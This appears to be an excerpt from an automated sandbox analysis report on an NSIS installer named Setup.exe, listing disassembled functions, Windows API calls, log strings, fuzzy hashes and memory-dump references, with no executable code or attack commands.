                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                • String ID: AllocatedPerceivedCombinesDutch$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                • API String ID: 1459762280-2174783431
                                                                                                                                                                                                                                                                • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                                                                                                                                                Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 832 402713-40273b call 406009 * 2 837 402746-402749 832->837 838 40273d-402743 call 40145c 832->838 840 402755-402758 837->840 841 40274b-402752 call 40145c 837->841 838->837 842 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 840->842 843 40275a-402761 call 40145c 840->843 841->840 843->842
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • <RM>, xrefs: 00402713
                                                                                                                                                                                                                                                                • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                                                                                                • AllocatedPerceivedCombinesDutch, xrefs: 00402770
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                • String ID: <RM>$AllocatedPerceivedCombinesDutch$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                • API String ID: 247603264-361201530
                                                                                                                                                                                                                                                                • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                                                                                                                                Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 939 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 950 402223-4030f2 call 4062a3 939->950 951 40220d-40221b call 4062a3 939->951 951->950
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                                                                                                Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 959 405e7f-405e8b 960 405e8c-405ec0 GetTickCount GetTempFileNameW 959->960 961 405ec2-405ec4 960->961 962 405ecf-405ed1 960->962 961->960 964 405ec6 961->964 963 405ec9-405ecc 962->963 964->963
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                                                                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                                                                                Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                                                                                Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                                                                                Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                                                                                Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                                                                                                Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
